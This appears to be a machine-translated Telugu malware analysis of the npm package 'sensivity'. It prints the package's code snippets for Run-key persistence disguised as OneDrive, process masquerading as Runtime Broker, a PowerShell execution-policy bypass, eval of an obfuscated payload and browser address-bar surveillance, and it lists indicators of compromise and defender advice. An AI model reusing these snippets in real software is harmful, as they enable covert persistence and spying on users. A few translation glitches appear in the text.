TL; DR
npm ప్యాకేజీ సున్నితత్వం ఇది తనను తాను "సెన్సిటివిటీ కంట్రోల్ ప్యానెల్"గా అభివర్ణించుకుంటుంది. విండోస్లో ఇది రిమోట్-కంట్రోల్ మరియు నిఘా సాధనంగా పనిచేస్తుంది.
దాని ప్రవేశ స్థానం, launcher.js, దాని స్వంత ప్రాసెస్ను రన్టైమ్ బ్రోకర్గా పేరు మార్చి, ఆటోస్టార్ట్ రన్-కీ విలువను వ్రాస్తుంది OneDriveUpdate అది ఒక రహస్య VBScript ద్వారా ప్యాకేజీని పునఃప్రారంభించి, PowerShellను ప్రారంభిస్తుంది. -ExecutionPolicy Bypass, ఆపై 6.87 MB నేటివ్ మాడ్యూల్తో పాటు 171 KB అస్పష్టమైన సర్వర్ పేలోడ్ను మూల్యాంకనం చేస్తుంది, sens.node.
ఇది TCP పోర్ట్ 3000లో ఫోన్-పెయిరింగ్ కంట్రోల్ ప్యానెల్ను అందిస్తుంది మరియు విండోస్ UIAutomation ద్వారా యాక్టివ్ బ్రౌజర్ యొక్క అడ్రస్-బార్ URLను చదువుతూ, హార్డ్-కోడెడ్ చేయబడిన ఒక యూట్యూబ్ వీడియో కోసం గమనిస్తూ ఉంటుంది.
ఇంతకుముందు అస్పష్టంగా వదిలివేయబడిన రెండు భాగాలు ఇప్పుడు పరిష్కరించబడ్డాయి. అస్పష్టంగా ఉన్న సర్వర్, server.obf.js, obfuscator.io RC4 స్ట్రింగ్-అరే స్కీమ్ను ఉపయోగిస్తుంది; దాని డీకోడర్ను ఆఫ్లైన్లో (జావాస్క్రిప్ట్ అమలు చేయకుండా) తిరిగి అమలు చేయడం ద్వారా ఒకే బాహ్య ఎండ్పాయింట్ను తిరిగి పొందవచ్చు — https://izopi.com/check.php — సంతకం చేసిన లైసెన్స్ ప్రతిస్పందనలను ధృవీకరించడానికి ఉపయోగించే ఎంబెడెడ్ RSA పబ్లిక్ కీతో పాటు.
స్థానిక మాడ్యూల్, sens.nodeఇది ప్యాక్ చేయబడలేదు: దీని ఇంపోర్ట్ టేబుల్ మరియు ఎంబెడెడ్ స్ట్రింగ్స్ దీనిని రిమోట్-ప్రాసెస్ ఇంజెక్షన్ మరియు మెమరీ రీడ్స్/రైట్స్ ద్వారా నడిచే, ఐమ్బాట్, ESP (వాల్-హ్యాక్), మరియు ట్రిగ్గర్బాట్ ఫీచర్లను అందించే ఒక డైరెక్ట్ఎక్స్ 11 / డియర్ ఇమ్గూయ్ ఇన్-గేమ్ ఓవర్లేగా గుర్తిస్తాయి.
దీనిలోని స్ట్రింగ్లు GTA V / FiveM లకు అనుగుణంగా వాహన ఎంటిటీలు మరియు మ్యాప్ లొకేషన్లను సూచిస్తాయి. ఈ npm ప్యాకేజీ, ఆ నేటివ్ మాడ్యూల్ చుట్టూ ఉండే డెలివరీ మరియు పర్సిస్టెన్స్ వ్రాపర్.
నిర్ణయాత్మక సంకేతం సాంకేతికమైనది కాదు, కార్యాచరణపరమైనది: ఒకే అనామక ప్రచురణకర్త ఒకే ప్యాకేజీకి చెందిన సుమారు డెబ్బై వెర్షన్లను ప్రచారం చేశారు — 2.5.0 నుండి 2.5.69 వరకు కొన్ని రోజుల పాటు, ప్రతి ఒక్కరూ ఒకే లాంచర్ను తీసుకువెళుతూ.
ఇన్స్టాల్ లేవు hooksప్యాకేజీ ప్రారంభమైనప్పుడు మాత్రమే పేలోడ్ నడుస్తుంది.
దాడి: అది ఎలా పనిచేస్తుంది
సెన్సిటివిటీ పది ఫైళ్లను పంపుతుంది. package.json చాలా సంక్షిప్తంగా ఉంటుంది: రిపోజిటరీ ఫీల్డ్ లేదు, లైసెన్స్ లేదు, ఒక మెయిన్ మరియు రెండు బిన్ అలియాస్లు (సెన్సిటివిటీ, సెన్స్) అన్నీ launcher.js వైపు చూపిస్తాయి, మరియు node launcher.js అనే స్టార్ట్ స్క్రిప్ట్ ఉంటుంది. పోస్ట్ఇన్స్టాల్ లేదా ప్రీఇన్స్టాల్ లేదు. npm ఇన్స్టాల్ చేసినప్పుడు ఏదీ ప్రారంభం కాదు. ఒక వినియోగదారు ప్యాకేజీని ప్రారంభించినప్పుడు — అది బిన్ షిమ్, స్టార్ట్ స్క్రిప్ట్, లేదా రిక్వైర్ ద్వారా అయినా — కింద వివరించిన ప్రవర్తన అమలు అవుతుంది.
టార్బాల్లో లాంచర్, ఒక అస్పష్టమైన సర్వర్, నేటివ్ మాడ్యూల్, ఒక విజువల్ బేసిక్ స్క్రిప్ట్, మరియు కంట్రోల్ ప్యానెల్ కోసం ఒక public/web డైరెక్టరీ ఉంటాయి. launcher.js అనేది చదవగలిగే ఆర్కెస్ట్రేటర్; రన్టైమ్లో ముఖ్యమైన లాజిక్ అది లోడ్ చేసే రెండు బ్లాబ్స్లో ఉంటుంది — ఒక అస్పష్టమైన సర్వర్ మరియు కంపైల్ చేయబడిన నేటివ్ మాడ్యూల్, ఈ రెండూ కింద పరిష్కరించబడ్డాయి.
ప్రాసెస్ మారువేషం మరియు నకిలీ OneDrive అప్డేటర్
అమలు ప్రారంభంలో launcher.js దాని స్వంత ప్రాసెస్ పేరును రెండుసార్లు సెట్ చేస్తుంది:
javascript process.title = 'Runtime Broker'; రన్టైమ్ బ్రోకర్ అనేది యాప్ అనుమతులను మధ్యవర్తిత్వం చేసే ఒక చట్టబద్ధమైన విండోస్ ప్రాసెస్ (RuntimeBroker.exe). ఒక నోడ్ ప్రాసెస్కు దానికి సరిపోయేలా పేరు మార్చడం వల్ల, టాస్క్ మేనేజర్ను ఒకసారి త్వరగా చూసినప్పుడు అసాధారణంగా ఏమీ కనిపించదు.
పెర్సిస్టెన్స్ అనేది డైరెక్ట్ రిజిస్ట్రీ API ద్వారా కాకుండా పవర్షెల్ ద్వారా వ్రాయబడుతుంది:
javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); ఆటోస్టార్ట్ విలువకు OneDriveUpdate అని పేరు పెట్టారు, మరియు అది ప్యాకేజీని నేరుగా సూచించదు. అది బండిల్ చేయబడిన OneDrive.Standalone.Updater.vbsను నడుపుతున్న wscript.exeను సూచిస్తుంది. ఆ స్క్రిప్ట్ ఒక దాచిన విండోలో node launcher.jsను తిరిగి ప్రారంభిస్తుంది. రన్-కీ పేరు మరియు VBScript ఫైల్ పేరు రెండూ మైక్రోసాఫ్ట్ బ్రాండింగ్ను కలిగి ఉంటాయి, కాబట్టి ఆటోస్టార్ట్ ఎంట్రీ ఒక సాధారణ OneDrive టాస్క్గా కనిపిస్తుంది.
ఎగ్జిక్యూషన్-పాలసీ బైపాస్తో పవర్షెల్
లాంచర్ పదేపదే పవర్షెల్ను ఉపయోగిస్తుంది. ఎగ్జిక్యూషన్ పాలసీ డిసేబుల్ చేయబడి, జనరేట్ చేయబడిన .ps1 ఫైల్ను లాంచ్ చేయడమే స్కానర్లు క్రిటికల్గా ఫ్లాగ్ చేసే సింక్:
javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); ఎగ్జిక్యూషన్ పాలసీ బైపాస్ ఆ ఇన్వోకేషన్ కోసం స్థానిక స్క్రిప్ట్-సైనింగ్ తనిఖీని తొలగిస్తుంది. రూపొందించబడిన స్క్రిప్ట్లు తదుపరి విభాగంలో వివరించిన బ్రౌజర్-నిఘా మరియు విండో-గుర్తింపు పనిని నిర్వహిస్తాయి.
అస్పష్ట సర్వర్ మరియు స్థానిక మాడ్యూల్
సెటప్ తర్వాత, launcher.js లోడ్ అయి దాని అసలైన పేలోడ్ను అమలు చేస్తుంది:
const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8')); server.obf.js అనేది 171 KB ఫైల్ ఉన్న _0x-array ఒబ్ఫస్కేషన్ ఫైల్. ఇది ఒక జావాస్క్రిప్ట్ ప్యాటర్న్, దీనిలో ప్రతి స్ట్రింగ్ మరియు ఐడెంటిఫైయర్ను షఫుల్ చేయబడిన అర్రేలోని ఒక ఇండెక్స్తో భర్తీ చేసి, ఆపై రన్టైమ్లో డీ-రిఫరెన్స్ చేస్తారు. ఈ స్కీమ్ obfuscator.io ద్వారా ఉత్పత్తి చేయబడిన RC4 వేరియంట్: ఒకే డీకోడర్ ఫంక్షన్ అర్రేలోని ఒక ఎంట్రీని బేస్64-డీకోడ్ చేసి, ఆపై ప్రతి కాల్కు ఒక కీతో దానిని RC4-డీక్రిప్ట్ చేస్తుంది. ఆ డీకోడర్ను ఒక ప్రత్యేక స్క్రిప్ట్లో తిరిగి అమలు చేయడం ద్వారా — ప్యాకేజీ యొక్క సొంత జావాస్క్రిప్ట్ను కాకుండా, సంగ్రహించిన 821-ఎంట్రీల స్ట్రింగ్ అర్రేపై కేవలం ఆ తిరిగి అమలు చేసిన ఫంక్షన్ను మాత్రమే రన్ చేయడం ద్వారా — దీనిని శుభ్రంగా అన్వైండ్ చేయవచ్చు. దీని ఫలితంగా కనిపించేది పరిమితమే అయినా, ఇది చాలా ప్రభావవంతమైనది.cisive: ఒక బాహ్య URL, `https://izopi.com/check.php`, ఇది LICENSE_URL స్థిరాంకానికి కేటాయించబడింది; ఒక ఎంబెడెడ్ RSA `PUBLIC_KEY_PEM`; స్థానిక ప్యానెల్ రూట్లు /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off, మరియు /trigger/status; మరియు `child_process`, `crypto`, మరియు `[Sensivity] `sens.node loaded` అనే స్ట్రింగ్లు — చివరిది, లాంచర్ `program module loaded` అని తిరిగి వ్రాసే ఖచ్చితమైన లాగ్ లైన్. ఈ ఎండ్పాయింట్ ఒక లైసెన్స్ తనిఖీ: క్లయింట్ ఒక ఐడెంటిఫైయర్ను పోస్ట్ చేస్తుంది (అస్పష్టమైన సర్వర్ ఒక డిస్కార్డ్ ID: %s స్ట్రింగ్ను ఫార్మాట్ చేస్తుంది) మరియు RSA కీ సర్వర్ యొక్క సంతకం చేసిన ప్రతిస్పందనను ధృవీకరిస్తుంది.
sens.node అనేది 6.87 MB పరిమాణం గల ఒక కంపైల్ చేయబడిన నేటివ్ యాడ్ఆన్, మరియు ఇది ప్యాక్ చేయబడలేదు — దీని సెక్షన్ ఎంట్రోపీ 5.6–6.6 మధ్య ఉంటుంది మరియు PE ఇంపోర్ట్, ఎక్స్పోర్ట్ పట్టికలు చెక్కుచెదరకుండా ఉన్నాయి, కాబట్టి దీని సామర్థ్యాలను నేరుగా చదవవచ్చు. ఇది napi_register_module_v1 ను ఎక్స్పోర్ట్ చేస్తుంది, standard నోడ్ N-API ఎంట్రీ పాయింట్, కాబట్టి eval చేయబడిన సర్వర్ దానిని ఒక సాధారణ requireతో లోడ్ చేస్తుంది. దాని ఇంపోర్ట్ టేబుల్ దీని ఉనికిని తెలియజేస్తుంది. KERNEL32 నుండి ఇది OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules, మరియు Process32First/NextW లను తీసుకుంటుంది — ఇవి మరొక ప్రాసెస్ను గుర్తించడానికి, దానిలో మెమరీని కేటాయించడానికి, మరియు ఆ మెమరీని చదవడానికి లేదా వ్రాయడానికి ఉపయోగపడే ప్రామాణిక సెట్. USER32 నుండి ఇది GetAsyncKeyState, GetKeyState, mouse_event, మరియు SetCursorPos లను తీసుకుంటుంది; ఇది ఆన్-స్క్రీన్ ఓవర్లే కోసం d3d11.dll, D3DCOMPILER_43, మరియు dwmapi లను, మరియు నెట్వర్క్ కాల్స్ కోసం పూర్తి WINHTTP సెట్ను లింక్ చేస్తుంది. దీనిలో పొందుపరిచిన స్ట్రింగ్లు ఫీచర్ సెట్కు ఎలాంటి అస్పష్టత లేకుండా పేర్లు పెడతాయి: ఎనేబుల్ ఐంబోట్, ఐంబోట్ FOV, బాక్స్ ESP, స్కెలిటన్ ESP, ట్రిగ్గర్బాట్, ESP బిల్డర్, వెహికల్ ESP, ఎలక్ట్రాన్ యాంటీచీట్ డిటెక్టెడ్, మరియు డియర్ ఇమ్గూయ్ బ్యానర్ డియర్ ఇమ్గూయ్ 1.91.3 WIP. గ్రేప్సీడ్ మెడికల్ క్లినిక్ వంటి లొకేషన్ మరియు ఎంటిటీ స్ట్రింగ్లు, అలాగే వెహికల్-ESP పదజాలం GTA V / FiveM లకు అనుగుణంగా ఉన్నాయి.
ఈ విభజన వాస్తవానికి ఉద్దేశపూర్వకమైనది: చదవగలిగే launcher.js ఫైల్లో, స్కానర్ సులభంగా చదవగలిగే భాగాలు — అంటే పర్సిస్టెన్స్, మాస్క్వెరేడ్, మరియు eval కాల్ — మాత్రమే ఉంటాయి. అదే సమయంలో, అబ్ఫస్కేషన్ అనేది రన్టైమ్ సంప్రదించే ఏకైక బాహ్య హోస్ట్ను దాచిపెడుతుంది, మరియు బైనరీ ఫైల్ గేమ్-ఓవర్లే మరియు ప్రాసెస్-ఇంజెక్షన్ లాజిక్ను కలిగి ఉంటుంది. లాంచర్ అనేది పలుచని, ఆడిట్ చేయదగిన పైపొర; అబ్ఫస్కేట్ చేయబడిన సర్వర్ నెట్వర్క్ గుర్తింపును దాచిపెడుతుంది; నేటివ్ మాడ్యూల్ అనేది పేలోడ్. మేము బైనరీ యొక్క ఇంపోర్ట్లు మరియు స్ట్రింగ్లను చదవగలిగేవిగా వర్ణిస్తాము; వాటి నుండి ఆపరేటర్ యొక్క ఉద్దేశ్యాన్ని మేము ఊహించము.
పోర్ట్ 3000లో ఫోన్-జత చేసే నియంత్రణ ప్యానెల్
లాంచర్ TCP పోర్ట్ 3000లో ఒక స్థానిక వెబ్ సర్వర్ను నిర్వహిస్తుంది మరియు దానిని ఒక సింగిల్టన్గా పరిగణిస్తుంది. ఇది ఇప్పటికే ఉన్న లిజనర్ కోసం ప్రశ్నించి, బైండింగ్ చేయడానికి ముందు దానిని క్లియర్ చేస్తుంది:
javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); ప్యానెల్ http://localhost:3000 వద్ద అందుబాటులో ఉంటుంది, దీనికి http://192.168.1.16:3000 అనే హార్డ్-కోడెడ్ LAN ఫాల్బ్యాక్ URL ఉంటుంది. public/ డైరెక్టరీ మరియు ప్యానెల్ యొక్క ప్రవర్తన QR-పెయిరింగ్ ఫ్లోకు అనుగుణంగా ఉంటాయి: ఒక ఫోన్ కోడ్ను స్కాన్ చేసి, హోస్ట్కు రిమోట్గా కనెక్ట్ అవుతుంది. లాంచర్లో ఎటువంటి బాహ్య కమాండ్-అండ్-కంట్రోల్ డొమైన్ స్పష్టంగా కనిపించదు — కానీ, పైన డీఓబ్ఫస్కేషన్ చూపినట్లుగా, ఓబ్ఫస్కేట్ చేయబడిన సర్వర్లో ఒకటి ఉంది: అదే izopi.com లైసెన్స్ ఎండ్పాయింట్. ప్యానెల్ స్వయంగా లోకల్ మరియు LAN-స్కోప్డ్; దాని ఏకైక అవుట్బౌండ్ హోస్ట్ ఆ లైసెన్స్ చెక్ మాత్రమే.
వేరు చేయబడిన సూపర్వైజర్/వర్కర్ మోడల్ ప్రాసెస్ను సజీవంగా ఉంచుతుంది. లాంచర్ SENSIVITY_SUPERVISOR మరియు SENSIVITY_WORKER ఎన్విరాన్మెంట్ ఫ్లాగ్లతో తనను తాను తిరిగి పునఃప్రారంభిస్తుంది, ప్రతి చైల్డ్ ప్రాసెస్ దాగి ఉండి నడుస్తుంది, కాబట్టి ఒక ప్రాసెస్ను నిలిపివేస్తే, దానిని పునఃప్రారంభించడానికి ఒక వాచ్డాగ్ మిగిలి ఉంటుంది.
బ్రౌజర్ నిఘా మరియు యూట్యూబ్ సిగ్నల్
అత్యంత నిర్దిష్టమైన ప్రవర్తన బ్రౌజర్ పర్యవేక్షణ. launcher.js అనేది పవర్షెల్ను నిర్మిస్తుంది, ఇది నడుస్తున్న బ్రౌజర్ యొక్క అడ్రస్ బార్ను చదవడానికి విండోస్ UIAutomationను నడిపిస్తుంది:
javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', ValuePattern ఒక UI ఎలిమెంట్ యొక్క టెక్స్ట్ కంటెంట్ను తిరిగి ఇస్తుంది. దీనిని బ్రౌజర్ యొక్క అడ్రస్-బార్ ఎడిట్ కంట్రోల్కు వర్తింపజేసినప్పుడు, ఇది బ్రౌజర్ ఎక్స్టెన్షన్ లేకుండా, డిస్క్లోని ప్రొఫైల్ను తాకకుండా, మరియు API హుక్ లేకుండా, బాధితుడు ప్రస్తుతం చూస్తున్న URLను తిరిగి ఇస్తుంది. రూపొందించబడిన స్క్రిప్ట్ $browserNames జాబితాను పునరావృతం చేస్తుంది మరియు ఫోర్గ్రౌండ్లో ఉన్న బ్రౌజర్ యొక్క URL లేదా విండో టైటిల్ను సంగ్రహిస్తుంది.
ఆ URL ఒకే హార్డ్-కోడెడ్ టార్గెట్కు వ్యతిరేకంగా పరీక్షించబడుతుంది:
javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; లాంచర్, యూట్యూబ్ను చూపిస్తున్న బ్రౌజర్ విండో కోసం ప్రతి మూడు సెకన్లకు ఒకసారి పోల్ చేస్తుంది, మరియు దాని ద్వారా రూపొందించబడిన పవర్షెల్, ఆ వీడియో ఐడితో సరిపోలే Get-YouTubeBrowser / Test-TargetYouTubeUrl జతను కలిగి ఉంటుంది. దీని వలన రెండు రకాల ప్రభావాలు గమనించవచ్చు: బాధితుని స్క్రీన్ నుండి యాక్టివ్ బ్రౌజింగ్ URL చదవబడుతుంది, మరియు హోస్ట్ ఒక నిర్దిష్ట యూట్యూబ్ వీడియోతో ఇంటరాక్ట్ అవుతున్నట్లు గుర్తించబడుతుంది. మేము ఈ యంత్రాంగాన్ని మరియు లక్ష్యాన్ని వివరిస్తాము; వాటి నుండి మేము ఎలాంటి ఉద్దేశాన్ని ఊహించము.
అడ్రస్-బార్ రీడ్ను స్కానర్ సెన్సిటివ్_డేటా_ఎన్యూమరేషన్ అని లేబుల్ చేస్తుంది — ఇది నెట్వర్క్-సామర్థ్యం గల రన్టైమ్కు ఫీడ్ చేసే ఒక Process::env మరియు UIAutomation సోర్స్. ఇది విడిగా చూసినప్పుడు ప్రమాదరహితంగా కనిపిస్తుంది మరియు UIAutomation సోర్స్ నుండి అస్పష్టం చేయబడిన సర్వర్ వరకు డేటా లైఫ్సైకిల్ను ట్రేస్ చేసిన తర్వాత మాత్రమే నిఘాగా మారుతుంది.
కాలక్రమం మరియు వెర్షన్ పరిణామం
సెన్సిటివిటీ అనేది ఒక్కసారి అప్లోడ్ చేసేది కాదు. ప్రచురణకర్త ఖాతాలో ఈ ఒక్క ప్యాకేజీకి సంబంధించిన సుమారు డెబ్బై ప్రచురించిన వెర్షన్లు ఉన్నాయి, మరియు సమీక్షా సమయంలో కొత్తవి వస్తూనే ఉన్నాయి. 2.5.x సిరీస్లో లాంచర్ ఫీచర్ వారీగా అభివృద్ధి చెందుతుంది, అయితే దాని పర్సిస్టెన్స్ మరియు పేలోడ్-లోడింగ్ స్థిరంగా ఉంటాయి.
| తేదీ (UTC) | గమనించిన సంస్కరణలు | లాంచర్ స్థితి |
|---|---|---|
| 2026-06-02 | 2.5.8 - 2.5.46 (25) | బేస్ క్యూఆర్-ప్యానెల్ లాంచర్; రన్-కీ పర్సిస్టెన్స్; అస్పష్టం చేయబడిన సర్వర్ యొక్క మూల్యాంకనం. |
| 2026-06-03 | 2.5.53 - 2.5.61 (6) | ఒకే వేలిముద్ర; కన్సోల్-ట్రేస్ నిరోధం. |
| 2026-06-04 | 2.5.67, 2.5.68 (2) | పిన్ చేయబడిన YouTube ఎంగేజ్మెంట్ లక్ష్యాన్ని జోడిస్తుంది wJWta2lO0Lw. |
| 2026-06-05 | 2.5.0 - 2.5.69 (24) | శ్రేణి అంతటా లోపాలను పూరించే పునఃప్రచురణ; పర్యవేక్షకుడు/కార్మికుల పర్యవేక్షకుడు. |
డౌన్లోడ్ చేయబడిన వెర్షన్లు — 2.5.0, 2.5.36, మరియు 2.5.69 — లోని లాంచర్ను పరిశీలిస్తే నాలుగు శ్రేణులు కనిపిస్తాయి. తొలి బిల్డ్లలో బేస్ QR-పెయిరింగ్ లాంచర్ ఉంటుంది. 2.5.33 నుండి UIAutomation అడ్రస్-బార్ హార్వెస్టర్ కనిపిస్తుంది. 2.5.58 నుండి సూపర్వైజర్-మేనేజ్మెంట్ లేయర్ జోడించబడింది. 2.5.64 నుండి డిటాచ్డ్ సూపర్వైజర్/వర్కర్ వాచ్డాగ్ ఈ సెట్ను పూర్తి చేస్తుంది. అన్నింటిలోనూ, నాలుగు విషయాలు ఎప్పటికీ మారవు: OneDriveUpdate రన్ కీ, OneDrive.Standalone.Updater.vbs డ్రాపర్, eval'd server.obf.js, మరియు sens.node నేటివ్ మాడ్యూల్.
2026-06-05 నాటి విడుదల ముఖ్యమైనది, ఎందుకంటే ఇది కొన్ని రోజుల క్రితం ధృవీకరించబడిన వెర్షన్ల కంటే దిగువన ఉన్న 2.5.0 నుండి 2.5.15 వరకు గల తక్కువ వెర్షన్ నంబర్లను తిరిగి ప్రచురించింది. దీని ప్రభావం వల్ల రిజిస్ట్రీలో వరుసగా 2.5.x లైన్ ఏర్పడింది, ప్రతి వెర్షన్ ఒకే లాంచర్ను కలిగి ఉంది.
రాజీ సూచికలు
దిగువన ఉన్న సూచికలన్నీ ప్యాకేజీ టార్బాల్ నుండి నేరుగా చదవబడ్డాయి. చదవగలిగే లాంచర్ కేవలం లూప్బ్యాక్ మరియు ఒకే ఒక ప్రైవేట్ LAN చిరునామాను కలిగి ఉంటుంది; izopi.com అనే ఆ ఒక్క బాహ్య హోస్ట్నేమ్ను, server.obf.jsను ఆఫ్లైన్లో డీఓబ్ఫస్కేట్ చేయడం ద్వారా పునరుద్ధరించబడింది.
| రకం | సూచిక | గమనికలు |
|---|---|---|
| ప్యాకేజీ | npm:sensivity (≈70 వెర్షన్లు, 2.5.0-2.5.69) | సింగిల్-ప్యాకేజ్ పబ్లిషర్; రిపోజిటరీ లేదు; లైసెన్స్ లేనిది. |
| ఫైలు | launcher.js | చదవగలిగే ఆర్కెస్ట్రేటర్; ప్రధాన మరియు బిన్ టార్గెట్. |
| ఫైలు | server.obf.js (≈171 KB) | obfuscator.io RC4 స్ట్రింగ్-అరే పేలోడ్, దీని ద్వారా లోడ్ చేయబడింది eval(fs.readFileSync(...)). |
| ఫైలు | sens.node (≈6.87 MB) | PE32+ x86-64 నోడ్ N-API యాడ్ఆన్; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40. |
| ఫైలు | OneDrive.Standalone.Updater.vbs | దాచిన పునఃప్రారంభం (node launcher.js). |
| నెట్వర్క్ | https://izopi.com/check.php | అస్పష్టం చేయబడిన సర్వర్ నుండి లైసెన్స్/ప్రామాణీకరణ ఎండ్పాయింట్ పునరుద్ధరించబడింది; పొందుపరిచిన RSA పబ్లిక్ కీ ప్రతిస్పందనలను ధృవీకరిస్తుంది. |
| సామర్ధ్యం | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread | రిమోట్-ప్రాసెస్ ఇంజెక్షన్ మరియు మెమరీ రీడ్/రైట్ సామర్థ్యం. |
| సామర్ధ్యం | Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP | ఐమ్బాట్, ESP, మరియు ట్రిగ్గర్బాట్ ఫీచర్లను అమలు చేసే డైరెక్ట్ఎక్స్ 11 / ImGui గేమ్ ఓవర్లే. |
| రిజిస్ట్రీ | HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate | ఆటోస్టార్ట్ విలువ సూచిస్తోంది wscript.exe మరియు VBScript లాంచర్. |
| ప్రాసెస్ | process.title = 'Runtime Broker' | చట్టబద్ధమైన విండోస్ రన్టైమ్ బ్రోకర్ ప్రాసెస్గా నటిస్తుంది. |
| బిహేవియరల్ | powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 | రూపొందించిన పవర్షెల్ స్క్రిప్ట్ల కోసం ఎగ్జిక్యూషన్-పాలసీ బైపాస్ ఉపయోగించబడుతుంది. |
| బిహేవియరల్ | UIAutomation ValuePattern బ్రౌజర్ చిరునామా పట్టీని చదవండి | ముందుభాగంలో ఉన్న బ్రౌజర్ విండో యొక్క URLను చదువుతుంది. |
| బిహేవియరల్ | లక్ష్య వీడియో ID wJWta2lO0Lw3-సెకన్ల యూట్యూబ్ పోల్ | నిశ్చితార్థ-పర్యవేక్షణ సంకేతాన్ని పిన్ చేసారు. |
| నెట్వర్క్ | http://localhost:3000, ఫాల్బ్యాక్ http://192.168.1.16:3000 | QR-పెయిరింగ్ కంట్రోల్ ప్యానెల్ స్థానికంగా మరియు LANలో అందుబాటులో ఉంది. |
| పర్యావరణ | SENSIVITY_SUPERVISOR, SENSIVITY_WORKER | వేరు చేయబడిన వాచ్డాగ్ ప్రాసెస్ సమన్వయ ఫ్లాగ్లు. |
ఆపాదించడం, ప్రభావం మరియు సమర్థకులు
ఈ ప్యాకేజీని ఒకే npm ఖాతా ప్రచురించింది, దాని ఈమెయిల్ ధృవీకరించబడని Gmail చిరునామాగా పేర్కొనబడింది. ఆ ఖాతాకు రిజిస్ట్రీలో చాలా ప్రతికూల ప్రతిష్టా స్కోరు ఉంది, అది కేవలం ఈ ఒక్క ప్యాకేజీని మాత్రమే నిర్వహిస్తుంది మరియు ప్రచురిస్తుంది, ఇంకా దానికి ఏ లింక్ చేయబడిన సోర్స్ రిపోజిటరీ లేదు. మేము ఈమెయిల్ యాజమాన్యాన్ని ధృవీకరించలేదు మరియు ఈ ప్రచారాన్ని ప్రచురణకర్త ఖాతాకే ఆపాదిస్తున్నాము, పేరున్న ఏ వ్యక్తికీ కాదు. ఈ లాంచర్లో ఎలాంటి క్లియర్టెక్స్ట్ మౌలిక సదుపాయాలు లేవు, కానీ ఒక బాహ్య హోస్ట్ ఇప్పుడు తెలిసింది: అస్పష్టం చేయబడిన సర్వర్ లైసెన్స్ తనిఖీ కోసం izopi.comను సంప్రదిస్తుంది, మరియు నేటివ్ మాడ్యూల్ — సూచనల వారీగా తిరగేయకుండా, దాని ఇంపోర్ట్ టేబుల్ మరియు స్ట్రింగ్ల నుండి చదవబడింది — అనేది మరొక ప్రాసెస్ యొక్క మెమరీలోకి చొప్పించి చదివే ఒక గేమ్ ఓవర్లే.
కంట్రోల్-ప్యానెల్ యుటిలిటీని ఆశించి సెన్సిటివిటీని ఇన్స్టాల్ చేసి, రన్ చేసే విండోస్ వినియోగదారులపై దీని ప్రభావం స్పష్టంగా కనిపిస్తుంది. ఆ హోస్ట్లలో, ఈ ప్యాకేజీ ఒక OneDrive టాస్క్ రూపంలో ఆటోస్టార్ట్ పర్సిస్టెన్స్ను ఏర్పాటు చేస్తుంది, ఒక సిస్టమ్ ప్రాసెస్ను అనుకరించడానికి తన పేరును మార్చుకుంటుంది, వినియోగదారు బ్రౌజ్ చేస్తున్న దాని యొక్క URLను చదువుతుంది, మరియు లోకల్ నెట్వర్క్ ద్వారా మెషీన్ను ఒక రిమోట్కు అనుసంధానించే పెయిరింగ్ ప్యానెల్ను ఏర్పాటు చేస్తుంది. సూపర్వైజర్/వర్కర్ వాచ్డాగ్ కారణంగా, ఒకే ప్రాసెస్ కిల్ దానిని తొలగించదు; రీబూట్ల తర్వాత కూడా రన్-కీ ఎంట్రీ అలాగే ఉంటుంది. ఈ లాంచర్ macOS మరియు Linuxలను లక్ష్యంగా చేసుకోదు — పర్సిస్టెన్స్, పవర్షెల్, మరియు UIAutomation పాత్లు కేవలం విండోస్కు మాత్రమే పరిమితం.
డెబ్బై వెర్షన్ల మార్పు అనేది గమనించదగిన ఒక ధోరణి. కొన్ని రోజుల్లోనే ఒకే ప్యాకేజీని డజన్ల కొద్దీ సార్లు తిరిగి ప్రచురించడం, అందులోనూ ఇప్పటికే తొలగించిన వెర్షన్ల కంటే తక్కువ వెర్షన్ నంబర్లను తిరిగి చేర్చడం వల్ల, తొలగింపుల మధ్య కూడా రిజిస్ట్రీలో ఒక లైవ్ కాపీ ఉంటుంది మరియు ఇది వెర్షన్కు పిన్ చేసిన బ్లాక్లిస్ట్లకు ఆటంకం కలిగిస్తుంది. sensivity@2.5.61 కోసం ఉన్న ఒక బ్లాక్లిస్ట్ ఎంట్రీ, మరుసటి రోజు తిరిగి ప్రచురించబడిన sensivity@2.5.3 పై ఎలాంటి ప్రభావం చూపదు.
రక్షకులు ఈ క్రింది వాటిపై చర్య తీసుకోవచ్చు:
- రిజిస్ట్రీ-ప్రాక్సీ మరియు CI అనుమతి జాబితాలలో ప్యాకేజీ పేరు సున్నితత్వాన్ని పూర్తిగా నిరోధించండి. వ్యక్తిగత వెర్షన్లను పిన్ చేయడం పునఃప్రచురణ క్రమానికి లొంగిపోతుంది; పేరే శాశ్వత సూచిక.
- ప్రతి-వినియోగదారు మార్గంలోని .vbs ఫైల్పై wscript.exeను అమలు చేసే OneDriveUpdate అనే పేరు గల రన్ విలువ కోసం వెతకండి. అసలైన OneDrive అప్డేటర్ ఈ విధంగా నమోదు చేయబడదు.
